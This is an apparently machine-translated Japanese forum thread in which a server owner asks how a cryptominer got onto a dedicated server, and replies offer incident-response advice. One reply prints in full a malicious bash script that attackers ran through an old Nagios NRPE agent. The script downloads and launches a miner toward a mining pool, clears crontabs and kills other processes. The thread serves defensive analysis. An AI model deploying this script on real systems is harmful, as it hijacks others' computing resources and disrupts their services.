ハッキングされたことがありますか？

最近CPU使用率が高いことに気付いた専用サーバーを実行して、プロセスを確認しました。私のサーバーで誰か（ミックアカウント）がマイニングしていたようです。これはどのようにして可能ですか？プロセスは以下のとおりです。アカウントを停止しました。他に何をする必要がありますか？

25516 mick  30  10  778m 6728 1132 S 740.5  0.2   8463:59 /tmp/sh64 -o stratum+tcp://multi1.wemineall.com:80 -u weedee.1 -p x --algo scrypt -B

サーバーサイドスクリプト（php、rubyなど）を許可するWebサーバーを実行している場合、これは非常に簡単です。

ユーザーがしなければならないことは、ファイルをダウンロードして実行するスクリプトを生成する/tmp/sh64ことだけです。Webスクリプトは通常、外部プログラムを実行できる必要があるため、この種のアクティビティを防止することは困難です。

mickアカウントがユーザーのWebスクリプトを実行するために使用されたものと同じアカウントであれば、ハッキングされていません。ユーザーが自分のアカウントを悪用しているだけです。

この動作を防止する場合、それを防止する方法はほとんどありません。外部プログラムの呼び出しを禁止することもできます。または、長時間実行されているプログラム（たとえば、60秒以上実行されたままになっているプログラム）を強制終了するなどの操作を実行できます。
セットアップの詳細を知らなければ、最善の行動を決定するのは困難です。

同様の問題がありました。彼らは、Nagiosの古いバージョンのNRPEエージェントを利用して、wgetSourceforgeからビットコインマイナーをインストールして構成したスクリプトを実行しました（NRPEデーモンがdont_blame_nrpe有効になっています）。私のマシンでの試みが持続的であったことを示すものは何も見つかりませんでした。

これは、ビットコインマイナーのインストールとセットアップに使用されたスクリプトです。

#!/bin/bash

miner_path="/tmp/tester"
miner_path2="/tmp/var/tester"
miner_path3="/dev/shm/tester"
stratum="stratum+tcp://multi1.wemineall.com:80"
worker="weedee.1"
myproc=`ps x|grep "$stratum -u $worker"|grep -v grep`
name="work.sh"
if [ -z "$myproc" ]
then    
    system=`uname -a`
    i686=`echo $system|grep i686`
    if ! [ -z "$i686" ]
      then

url="http://downloads.sourceforge.net/project/cpuminer/pooler-cpuminer-2.3.2-linux-x86.tar.gz?r=http%3A%2F%2Fsourceforge.net%2Fprojects%2Fcpuminer%2Ffiles%2F&ts=1390664640&use_mirror=netcologne"
      else

url="http://downloads.sourceforge.net/project/cpuminer/pooler-cpuminer-2.3.2-linux-x86_64.tar.gz?r=http%3A%2F%2Fsourceforge.net%2Fprojects%2Fcpuminer%2Ffiles%2F&ts=1390664665&use_mirror=netcologne"
    fi

    dll=`wget -q -O $miner_path $url;tar zxvf $miner_path -C /var/tmp/;mv /var/tmp/minerd $miner_path;chmod +x $miner_path`
    spwn=`$miner_path -o $stratum -u $worker -p x --algo scrypt -B 2>/dev/null 1>/dev/null &`
    myproc=`ps x|grep "$stratum -u $worker"|grep -v grep`
    #Failed in /var/tmp/ trying in /dev/shm
    if [ -z "$myproc" ]
    then
        #dll=`wget $url -O $miner_path2;chmod +x $miner_path2`
        dll=`wget -q -O $miner_path2 $url;tar zxvf $miner_path2 -C /tmp/;mv /tmp/minerd $miner_path2;chmod +x $miner_path2`
        spwn=`$miner_path2 -o $stratum -u $worker -p x --algo scrypt -B 2>/dev/null 1>/dev/null &`      
    fi
    myproc=`ps x|grep "$stratum -u $worker"|grep -v grep`
    #Failed in /tmp/ trying in /tmp
    if [ -z "$myproc" ]
    then        
        dll=`wget -q -O $miner_path3 $url;tar zxvf $miner_path3 -C /dev/shm/;mv /dev/shm/minerd $miner_path3;chmod +x $miner_path3`
        spwn=`$miner_path3 -o $stratum -u $worker -p x --algo scrypt -B 2>/dev/null 1>/dev/null &`      
    fi  

myproc=`ps x|grep "$stratum -u $worker"|grep -v grep`
  crontab -r
 fi  
 crontab -r
rm -rf /var/tmp/*.sh
kill -9 `ps x | grep -v nagios | grep -v nrpe | grep -v PID | grep -v $name | grep -v tester | grep -v grep | awk '{print $1}'

このスクリプトは完全にNagiosユーザーとして実行されたため、ルートアクセスは必要ありませんでした。

あなたのシステムは間違いなく侵害されているか、最悪の場合ハッキングされています。インストールされている同様の鉱山労働者を説明する他の物語があります。

• システムハッキング、ビットコインマイナーがインストールされています
• Linuxラボボックスはハッキングされましたか？
• グーグル経由のビットコインマイニングマルウェアの検索結果

私はあなたのシステムが危険にさらされているという立場を取って、それから重要なものを始めて、それがまだ行われていないならあなたがそれをバックアップするようにします。

分析

それらがどのように侵入したかが気になる場合は、インストールしたサービス（web、mysqlなど）の完全なリストを取得し、誰かが昇格した特権を取得できるようにするアクティブなエクスプロイトがあるかどうかを確認する必要があります。

まず、WebベースのアプリケーションであるWebの有効化から始めます。通常、これらのアプリケーションはバッファオーバーフローが発生し、追加のアプリケーションをインストールできるようにWebサーバーのスタックを変更するためにアクセスできます。

これらのタイプの侵害は孤立したインシデントである可能性があるため、問題のあるソフトウェアとマルウェアを削除するだけで、システムの完全な回復/セットアップにかかる時間の費用を我慢することなく、それを根絶することができます。

このシステムがVPSベースのイメージを使用して構築されている場合、パッチを適用することはすべての顧客にとって最善の利益になると思われるため、プロバイダーと協力します。

Webスタックを危険にさらすだけではありません

ボックス上のすべてを精査する必要があり、本質的に信頼できないものですが、攻撃者がどこからログインしているかを把握できない場合は、少し時間がかかります。システムを侵害した後にシステムに追加されたSSHアカウントを使用してログインしている可能性があります。

これは、特にこの作業を支援するためのボックス上のツールを信頼できない場合は、分析に何日もかかる困難な作業になる可能性があります。少なくともこの特定の方法によって、システムがどのように侵害されて将来再び発生するリスクを減らすことができるかを理解するために、この時間を取ってください。

これが本番タイプの問題ではない場合、これは実際には、システムがどのように侵害され、アクセスが攻撃者によって「レバレッジ」されるかについての貴重な洞察を得るための良い学習機会です。

シルバーの裏地？

このシステムは採掘目的で使用されているため、ゾンビマイナーをセットアップするのに十分なシステムを攻撃するにはかなりの時間がかかるように思われるため、自動化されたスクリプトツールセットを使用した可能性があります。これらのようなツールを使用する場合、それらは通常、構造の面倒で、足場を得るために最低限必要なことだけを行い、ペイロード（マイニングソフトウェア）を配信するだけなので、幸運にもいくつかの洞察を得ることができます彼らがどうやって入ることができたかについて。